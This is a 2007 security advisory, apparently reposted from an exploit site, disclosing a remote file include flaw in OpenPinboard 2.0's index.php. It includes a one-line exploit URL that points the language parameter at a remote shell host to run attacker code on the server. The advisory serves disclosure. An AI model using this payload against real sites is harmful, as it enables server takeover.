Security Advisory: OpenPinboard <= Remote File Include

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  jgbbs
  WineGlass "data.mdb" Remote Password Disclosure
  openmedia local read file

From: zooz_998_(at)_hotmail.com <zooz_998_(at)_hotmail.com>
Date: 04.01.2007
Subject: OpenPinboard <= Remote File Include

#================================================================================
======
# OpenPinboard <= Remote File Include
#================================================================================
======
#
# Scripts: OpenPinboard
#
# Download :http
://osdn.dl.sourceforge.net/sourceforge/openpinboard/openpinboard_2.0.tar.gz
#
# Version : 2.0
=================================================================================
=====
#)Bug in :( index.php
#
#code : ;(require_once ($language
#================================================================================
======
#Exploit :
#

#
#http://www.site.com/[script_path]/index.php?language=http://sh3LL?
#
#================================================================================
======
#Discoverd By : ZooZ
#

#Conatact : zooz_998[at]hotmail.com
#

#
#

#Greetz to :
#abu_shahad | R00T-shilL | v1per-haCker | alkasergolden | MR-WOLF | abu nawaf | Muhajer22 |cRiMiNaL NeT
# cold zero | Barod | bEn_slimAN |
#

#

#And All Members In tryag and 4azhar
#
#
#================================================================================
======

test server